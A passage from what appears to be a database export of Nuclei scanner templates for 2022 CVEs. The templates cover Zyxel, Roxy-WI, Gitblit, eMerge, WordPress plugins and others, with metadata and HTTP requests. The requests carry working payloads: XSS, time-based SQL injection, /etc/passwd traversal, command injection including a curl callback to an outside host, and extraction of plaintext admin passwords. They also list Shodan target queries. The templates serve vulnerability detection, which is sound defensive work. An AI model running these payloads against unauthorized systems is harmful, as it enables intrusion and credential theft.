/dms/admin/login.php?f=login HTTP/1.1\n Host: {{Hostname}}\n\n username={{username}}&password={{password}}\n - |\n GET /dms/admin/?page=%27%3B%20alert(document.domain)%3B%20s%3D%27 HTTP/1.1\n Host: {{Hostname}}\n\n redirects: true\n max-redirects: 2\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_2\n words:\n - \"''; alert(document.domain); s='';\"\n - \"School Dormitory Management System\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022055880a1d2bd6c83c488dd0360a5e4c17e959313d13984eb03f1acbb91d91486e02202fa6c8f1c60e3b6aa7804866b86adead45cd8933590438437a1263b8e20319c0:922c64590222798bb761d5b6d8e72950", "hash": "f6ef5e61e456b43e8d17d5cfd08c4185", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30851a" }, "name": "CVE-2022-30514.yaml", "content": "id: CVE-2022-30514\n\ninfo:\n name: School Dormitory Management System 1.0 - Authenticated Cross-Site Scripting\n author: tess\n severity: medium\n description: |\n School Dormitory Management System 1.0 contains an authenticated cross-site scripting vulnerability in admin/inc/navigation.php:126. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an authenticated attacker to inject malicious scripts into the application, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://github.com/bigzooooz/CVE-2022-30514\n - https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30514\n - https://nvd.nist.gov/vuln/detail/CVE-2022-30514\n - https://github.com/Marcuccio/kevin\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-30514\n cwe-id: CWE-79\n epss-score: 0.00097\n epss-percentile: 0.39401\n cpe: cpe:2.3:a:school_dormitory_management_system_project:school_dormitory_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: school_dormitory_management_system_project\n product: school_dormitory_management_system\n tags: cve,cve2022,xss,authenticated,school_dormitory_management_system_project\n\nhttp:\n - raw:\n - |\n POST /dms/admin/login.php?f=login HTTP/1.1\n Host: {{Hostname}}\n\n username={{username}}&password={{password}}\n - |\n GET /dms/admin/?s=%27%3B%20alert(document.domain)%3B%20s%3D%27 HTTP/1.1\n Host: {{Hostname}}\n\n redirects: true\n max-redirects: 2\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_2\n words:\n - \"''; alert(document.domain); s='';\"\n - \"School Dormitory Management System\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100e1cbf9f22134eb78b7d8269338039056f10e9a1d459561bfeb4a4273ceb08d4302203b2f1ddc9b80bac96a44fba68d9c28c248e12ef89a720e1ce2a1921fc0fb9a63:922c64590222798bb761d5b6d8e72950", "hash": "141d1cd713a2d85b08a9d3abe930808b", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30851b" }, "name": "CVE-2022-30525.yaml", "content": "id: CVE-2022-30525\n\ninfo:\n name: Zyxel Firewall - OS Command Injection\n author: h1ei1,prajiteshsingh\n severity: critical\n description: |\n An OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, are susceptible to a command injection vulnerability which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized remote code execution, compromising the confidentiality, integrity, and availability of the affected system.\n remediation: |\n Apply the latest security patches or firmware updates provided by Zyxel to mitigate this vulnerability.\n reference:\n - https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/\n - https://github.com/rapid7/metasploit-framework/pull/16563\n - https://www.zyxel.com/support/Zyxel-security-advisory-for-OS-command-injection-vulnerability-of-firewalls.shtml\n - https://nvd.nist.gov/vuln/detail/CVE-2022-30525\n - http://packetstormsecurity.com/files/167176/Zyxel-Remote-Command-Execution.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-30525\n cwe-id: CWE-78\n epss-score: 0.97482\n epss-percentile: 0.99967\n cpe: cpe:2.3:o:zyxel:usg_flex_100w_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: zyxel\n product: usg_flex_100w_firmware\n shodan-query: title:\"USG FLEX 100\",\"USG FLEX 100w\",\"USG FLEX 200\",\"USG FLEX 500\",\"USG FLEX 700\",\"USG FLEX 50\",\"USG FLEX 50w\",\"ATP100\",\"ATP200\",\"ATP500\",\"ATP700\"\n tags: cve2022,cve,packetstorm,zyxel,firewall,unauth,kev,msf,rce\n\nhttp:\n - raw:\n - |\n POST /ztp/cgi-bin/handler HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json\n\n {\"command\":\"setWanPortSt\",\"proto\":\"dhcp\",\"port\":\"4\",\"vlan_tagged\":\"1\",\"vlanid\":\"5\",\"mtu\":\"; curl {{interactsh-url}};\",\"data\":\"hi\"}\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: status\n status:\n - 500\n# digest: 4b0a00483046022100d2611a4bbd37c92e10c7c04c5287817c5276dc06e9595aa43f4c7e2d7f9d6f32022100e8b1382edb51ac7f80e2006d4ef501e49d529af2ea63b39cb9842b574f17f6db:922c64590222798bb761d5b6d8e72950", "hash": "b2766dd764857d8847a1c634e349ee6a", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30851c" }, "name": "CVE-2022-3062.yaml", "content": "id: CVE-2022-3062\n\ninfo:\n name: Simple File List < 4.4.12 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n The plugin does not escape parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: Fixed in version 4.4.12\n reference:\n - https://wpscan.com/vulnerability/2e829bbe-1843-496d-a852-4150fa6d1f7a\n - https://nvd.nist.gov/vuln/detail/CVE-2022-3062\n - https://wordpress.org/plugins/simple-file-list/\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-3062\n cwe-id: CWE-79\n epss-score: 0.0012\n epss-percentile: 0.46075\n cpe: cpe:2.3:a:simplefilelist:simple-file-list:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: simplefilelist\n product: simple-file-list\n framework: wordpress\n tags: cve,cve2022,authenticated,wordpress,wp-plugin,wp,wpscan,xss,simple-file-list,simplefilelist\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/?page=ee-simple-file-list&tab=settings&subtab=\"style=animation-name:rotation+onanimationstart=alert(document.domain)// HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \"ee-simple-file-list\")'\n - 'contains(body_2, \"onanimationstart=alert(document.domain)//\")'\n condition: and\n# digest: 4a0a004730450221009b8058e2d09fded7acc96d56479398cd66ad473245c9a0aedcd58109aade3dc502204b7c40619880f5fc9c9742dedc31da8c5ec37f59fe121a562c11d2884098bb5b:922c64590222798bb761d5b6d8e72950", "hash": "37cf49ce1c064355e6646cf5ce2ead27", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30851d" }, "name": "CVE-2022-30776.yaml", "content": "id: CVE-2022-30776\n\ninfo:\n name: Atmail 6.5.0 - Cross-Site Scripting\n author: 3th1c_yuk1\n severity: medium\n description: |\n Atmail 6.5.0 contains a cross-site scripting vulnerability via the index.php/admin/index/ 'error' parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or upgrade to a newer version of Atmail that addresses this vulnerability.\n reference:\n - https://medium.com/@bhattronit96/cve-2022-30776-cd34f977c2b9\n - https://www.atmail.com/\n - https://help.atmail.com/hc/en-us/sections/115003283988\n - https://nvd.nist.gov/vuln/detail/CVE-2022-30776\n - https://medium.com/%40bhattronit96/cve-2022-30776-cd34f977c2b9\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-30776\n cwe-id: CWE-79\n epss-score: 0.00112\n epss-percentile: 0.43631\n cpe: cpe:2.3:a:atmail:atmail:6.5.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: atmail\n product: atmail\n shodan-query: http.html:\"atmail\"\n tags: cve2022,cve,atmail,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/atmail/index.php/admin/index/?error=1%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Error: 1\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502210098e7e92637618d4c3c5540938565842f9d2479c1b7a7ca9a9333b2e0bf64a29b022077e0d1d54bd671842a9ba69fdbad1ed67e8c6f085c3235fde69b2d9e18009833:922c64590222798bb761d5b6d8e72950", "hash": "7024c6a73b3c17317be9b40713c9b3f1", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30851e" }, "name": "CVE-2022-30777.yaml", "content": "id: CVE-2022-30777\n\ninfo:\n name: Parallels H-Sphere 3.6.1713 - Cross-Site Scripting\n author: 3th1c_yuk1\n severity: medium\n description: |\n Parallels H-Sphere 3.6.1713 contains a cross-site scripting vulnerability via the index_en.php 'from' parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patch or upgrade to a newer version of Parallels H-Sphere to mitigate the XSS vulnerability.\n reference:\n - https://medium.com/@bhattronit96/cve-2022-30777-45725763ab59\n - https://en.wikipedia.org/wiki/H-Sphere\n - https://nvd.nist.gov/vuln/detail/CVE-2022-30777\n - https://medium.com/%40bhattronit96/cve-2022-30777-45725763ab59\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-30777\n cwe-id: CWE-79\n epss-score: 0.00087\n epss-percentile: 0.36061\n cpe: cpe:2.3:a:parallels:h-sphere:3.6.2:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: parallels\n product: h-sphere\n shodan-query: title:\"h-sphere\"\n tags: cve,cve2022,parallels,hsphere,xss\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/index_en.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n - '{{BaseURL}}/index.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - '\"><script>alert(document.domain)</script>'\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220193f90816efc79d2ac468c37e58a42add449c9c53f48ed07934c74f756d9550d022100bc87714095325fe51d81827336aa365718a61f67c95e590fea50198ba245e3eb:922c64590222798bb761d5b6d8e72950", "hash": "3d2511228743863d9096f1d6551b5470", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30851f" }, "name": "CVE-2022-31126.yaml", "content": "id: CVE-2022-31126\n\ninfo:\n name: Roxy-WI <6.1.1.0 - Remote Code Execution\n author: DhiyaneshDK\n severity: critical\n description: |\n Roxy-WI before 6.1.1.0 is susceptible to remote code execution. System commands can be run remotely via the subprocess_execute function without processing the inputs received from the user in the /app/options.py file.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: Users are advised to upgrade to latest version.\n reference:\n - http://packetstormsecurity.com/files/167805/Roxy-WI-Remote-Command-Execution.html\n - https://www.cve.org/CVERecord?id=CVE-2022-31137\n - https://github.com/hap-wi/roxy-wi/security/advisories/GHSA-mh86-878h-43c9\n - https://nvd.nist.gov/vuln/detail/CVE-2022-31137\n - https://nvd.nist.gov/vuln/detail/CVE-2022-31126\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-31126\n cwe-id: CWE-74\n epss-score: 0.84229\n epss-percentile: 0.98401\n cpe: cpe:2.3:a:roxy-wi:roxy-wi:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: roxy-wi\n product: roxy-wi\n shodan-query: http.html:\"Roxy-WI\"\n tags: cve2022,cve,rce,unauth,roxy,packetstorm,roxy-wi\n\nhttp:\n - raw:\n - |\n POST /app/options.py HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n X-Requested-With: XMLHttpRequest\n Origin: {{BaseURL}}\n Referer: {{BaseURL}}/app/login.py\n\n alert_consumer=1&serv=127.0.0.1&ipbackend=\";cat+/etc/passwd+##&backend_server=127.0.0.1\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022035556f4f3cd81f9c1bc3e3f30b1581e866314ebc8a754dc6d59d7454b6bd68dd02210091e38ffa5218626fa5a430bdff1748cf16744eb74873df46f70e9fca805896c1:922c64590222798bb761d5b6d8e72950", "hash": "769392c2ce97028638af3b11da8e938d", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308520" }, "name": "CVE-2022-31268.yaml", "content": "id: CVE-2022-31268\n\ninfo:\n name: Gitblit 1.9.3 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: |\n Gitblit 1.9.3 is vulnerable to local file inclusion via /resources//../ (e.g., followed by a WEB-INF or META-INF pathname).\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the affected system.\n remediation: |\n Upgrade Gitblit to a version that is not affected by the vulnerability (CVE-2022-31268).\n reference:\n - https://github.com/metaStor/Vuls/blob/main/gitblit/gitblit%20V1.9.3%20path%20traversal/gitblit%20V1.9.3%20path%20traversal.md\n - https://vuldb.com/?id.200500\n - https://nvd.nist.gov/vuln/detail/CVE-2022-31268\n - https://github.com/Marcuccio/kevin\n - https://github.com/20142995/sectool\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-31268\n cwe-id: CWE-22\n epss-score: 0.00618\n epss-percentile: 0.76574\n cpe: cpe:2.3:a:gitblit:gitblit:1.9.3:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: gitblit\n product: gitblit\n shodan-query: http.html:\"Gitblit\"\n tags: cve,cve2022,lfi,gitblit\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/resources//../WEB-INF/web.xml\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"</web-app>\"\n - \"java.sun.com\"\n - \"gitblit.properties\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"application/xml\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100e2e1fcaa58d2dee7545ceebd7a5676ce15a39fc9158480ee7246e0b44b801c19022100bd5e8b3b6dea5d148c40a77c6183f6e003c34e77f22ac9d017f7b00b202f9952:922c64590222798bb761d5b6d8e72950", "hash": "ece4bccd3d807f8ca41641d0bf800346", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308521" }, "name": "CVE-2022-31269.yaml", "content": "id: CVE-2022-31269\n\ninfo:\n name: Linear eMerge E3-Series - Information Disclosure\n author: For3stCo1d\n severity: high\n description: |\n Linear eMerge E3-Series devices are susceptible to information disclosure. Admin credentials are stored in clear text at the endpoint /test.txt in situations where the default admin credentials have been changed. An attacker can obtain admin credentials, access the admin dashboard, control building access and cameras, and access employee information.\n impact: |\n An attacker can exploit this vulnerability to gain sensitive information from the device.\n remediation: |\n Apply the latest firmware update provided by the vendor to fix the vulnerability.\n reference:\n - https://packetstormsecurity.com/files/167990/Nortek-Linear-eMerge-E3-Series-Credential-Disclosure.html\n - https://www.nortekcontrol.com/access-control/\n - https://eg.linkedin.com/in/omar-1-hashem\n - https://nvd.nist.gov/vuln/detail/CVE-2022-31269\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N\n cvss-score: 8.2\n cve-id: CVE-2022-31269\n cwe-id: CWE-798\n epss-score: 0.00231\n epss-percentile: 0.6049\n cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: nortekcontrol\n product: emerge_e3_firmware\n shodan-query: http.title:\"Linear eMerge\"\n tags: cve,cve2022,emerge,exposure,packetstorm,nortekcontrol\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/test.txt\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"ID=\"\n - \"Password=\"\n condition: and\n\n - type: word\n part: header\n words:\n - text/plain\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n regex:\n - Password='(.+?)'\n# digest: 4a0a004730450220211b8b052d35c8c0e6a761490e6c1b685d1d56b894054fd40f62eb2b07c5ffa8022100a1cd1709ff09731bac0575fa634a80cf43322d879c77cd786771c0de881a2f50:922c64590222798bb761d5b6d8e72950", "hash": "d07ae00e1db985e3766679719258943a", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308522" }, "name": "CVE-2022-31299.yaml", "content": "id: CVE-2022-31299\n\ninfo:\n name: Haraj 3.7 - Cross-Site Scripting\n author: edoardottt\n severity: medium\n description: |\n Haraj 3.7 contains a cross-site scripting vulnerability in the User Upgrade Form. An attacker can inject malicious script and thus steal authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.\n reference:\n - https://github.com/bigzooooz/CVE-2022-31299\n - https://angtech.org\n - https://nvd.nist.gov/vuln/detail/CVE-2022-31299\n - https://angtech.org/product/view/3\n - https://github.com/trhacknon/Pocingit\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-31299\n cwe-id: CWE-79\n epss-score: 0.00209\n epss-percentile: 0.58245\n cpe: cpe:2.3:a:angtech:haraj:3.7:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: angtech\n product: haraj\n tags: cve,cve2022,haraj,xss,angtech\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/payform.php?type=upgrade&upgradeid=1&upgradegd=6&price=123&t=1¬e=%3C/textarea%3E%3Cscript%3Ealert(document.domain)%3C/script%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '><script>alert(document.domain)</script></textarea>'\n - 'content=\"nextHaraj'\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220107082951fb57d51f08b7e519d2eddac32a210758fa0a1e697b5481071bcdf4d0220106c1631d6f85f20235fddd9930929c3bd344de8de936b4a700dd0e93f9d9912:922c64590222798bb761d5b6d8e72950", "hash": "d613816fb60463b9e27de21a692dd037", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308523" }, "name": "CVE-2022-31373.yaml", "content": "id: CVE-2022-31373\n\ninfo:\n name: SolarView Compact 6.00 - Cross-Site Scripting\n author: ritikchaddha\n severity: medium\n description: |\n SolarView Compact 6.00 contains a cross-site scripting vulnerability via Solar_AiConf.php. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://github.com/badboycxcc/SolarView_Compact_6.0_xss\n - https://nvd.nist.gov/vuln/detail/CVE-2022-31373\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/badboycxcc/badboycxcc\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-31373\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36353\n cpe: cpe:2.3:o:contec:sv-cpt-mc310_firmware:6.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: contec\n product: sv-cpt-mc310_firmware\n shodan-query: http.html:\"SolarView Compact\"\n tags: cve2022,cve,xss,solarview,contec\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/Solar_AiConf.php/%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '/Solar_AiConf.php/\"><script>alert(document.domain)</script>'\n - 'HREF=\"Solar_Service.php\"'\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100e198facad20dc156feda279d1ce49117cb3d0baf80f67f7e1309efc885bbfe0e022002895be93b1e631fb4d53c0c2f701b0db0afe312b24eca373958d7eb78c65b88:922c64590222798bb761d5b6d8e72950", "hash": "bec76da3e718672f1938f7fbd0d35aed", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308524" }, "name": "CVE-2022-3142.yaml", "content": "id: CVE-2022-3142\n\ninfo:\n name: NEX-Forms Plugin < 7.9.7 - SQL Injection\n author: r3Y3r53\n severity: high\n description: |\n The NEX-Forms WordPress plugin before 7.9.7 does not properly sanitise and escape user input before using it in SQL statements, leading to SQL injections. The attack can be executed by anyone who is permitted to view the forms statistics chart, by default administrators, however can be configured otherwise via the plugin settings.\n remediation: Fixed in version 7.9.7\n reference:\n - https://wpscan.com/vulnerability/8acc0fc6-efe6-4662-b9ac-6342a7823328/\n - https://www.exploit-db.com/exploits/51042\n - https://nvd.nist.gov/vuln/detail/CVE-2022-3142\n - http://packetstormsecurity.com/files/171477/WordPress-NEX-Forms-SQL-Injection.html\n - https://medium.com/%40elias.hohl/authenticated-sql-injection-vulnerability-in-nex-forms-wordpress-plugin-35b8558dd0f5\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2022-3142\n cwe-id: CWE-89\n epss-score: 0.00356\n epss-percentile: 0.71515\n cpe: cpe:2.3:a:basixonline:nex-forms:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: basixonline\n product: nex-forms\n framework: wordpress\n publicwww-query: /wp-content/plugins/nex-forms-express-wp-form-builder/\n tags: cve,cve2022,wpscan,packetstorm,wordpress,sqli,wp-plugin,wp,authenticated,basixonline\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n @timeout: 30s\n GET /wp-admin/admin.php?page=nex-forms-dashboard&form_id=1+AND+(SELECT+42+FROM+(SELECT(SLEEP(7)))b)-- HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=7'\n - 'status_code_2 == 200'\n - 'contains(body_2, \"NEX-Forms\")'\n - 'contains(content_type_2, \"text/html\")'\n condition: and\n# digest: 4a0a0047304502205b7faf48f4f1f5800cf6e79acf865fd5728af61add5cb2e3d656eab6c6a58cab022100be6bb84cb11f81bb21838b305a5137642c88f1f2c754b41bd8c067ae4eda6f34:922c64590222798bb761d5b6d8e72950", "hash": "11334464026274b5c2f93f7b6e798167", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308525" }, "name": "CVE-2022-31474.yaml", "content": "id: CVE-2022-31474\n\ninfo:\n name: BackupBuddy - Local File Inclusion\n author: aringo\n severity: high\n description: BackupBuddy versions 8.5.8.0 - 8.7.4.1 are vulnerable to a local file inclusion vulnerability via the 'download' and 'local-destination-id' parameters.\n impact: |\n An attacker can exploit this vulnerability to gain unauthorized access to sensitive information stored on the server.\n remediation: Upgrade to at least version 8.7.5 or higher\n reference:\n - https://www.wordfence.com/blog/2022/09/psa-nearly-5-million-attacks-blocked-targeting-0-day-in-backupbuddy-plugin/\n - https://ithemes.com/blog/wordpress-vulnerability-report-special-edition-september-6-2022-backupbuddy\n - https://ithemes.com/backupbuddy/\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31474\n - https://ithemes.com/blog/wordpress-vulnerability-report-special-edition-september-6-2022-backupbuddy/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-31474\n cwe-id: CWE-22\n epss-score: 0.0063\n epss-percentile: 0.78579\n cpe: cpe:2.3:a:ithemes:backupbuddy:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: ithemes\n product: backupbuddy\n framework: wordpress\n tags: cve,cve2022,wordpress,wp-plugin,wp,lfi,backupbuddy,ithemes\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=/etc/passwd&local-download=/etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100ecf44787bd6300f50e4a767ffe601dd4051e6dadfe6cd36dcbb948a853a44dbf02205339443407fd4fb29ff75bd9f6565a7dc2d382e699cca5b76c135da1b219d1cc:922c64590222798bb761d5b6d8e72950", "hash": "2a2fa0c352e2029815c9602e19ca2f6a", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308526" }, "name": "CVE-2022-31499.yaml", "content": "id: CVE-2022-31499\n\ninfo:\n name: Nortek Linear eMerge E3-Series <0.32-08f - Remote Command Injection\n author: pikpikcu\n severity: critical\n description: |\n Nortek Linear eMerge E3-Series devices before 0.32-08f are susceptible to remote command injection via ReaderNo. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. NOTE: this vulnerability exists because of an incomplete fix for CVE-2019-7256.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system.\n remediation: |\n Upgrade to a patched version of Nortek Linear eMerge E3-Series (>=0.32-08f) to mitigate this vulnerability.\n reference:\n - https://packetstormsecurity.com/files/167991/Nortek-Linear-eMerge-E3-Series-Command-Injection.html\n - https://github.com/omarhashem123/CVE-2022-31499\n - http://packetstormsecurity.com/files/167991/Nortek-Linear-eMerge-E3-Series-Command-Injection.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-31499\n - https://eg.linkedin.com/in/omar-1-hashem\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-31499\n cwe-id: CWE-78\n epss-score: 0.50608\n epss-percentile: 0.97247\n cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: nortekcontrol\n product: emerge_e3_firmware\n shodan-query: title:\"eMerge\"\n tags: cve,cve2022,packetstorm,emerge,rce,nortekcontrol\n\nhttp:\n - raw:\n - |\n @timeout: 15s\n GET /card_scan.php?No=123&ReaderNo=`sleep%207`&CardFormatNo=123 HTTP/1.1\n Host: 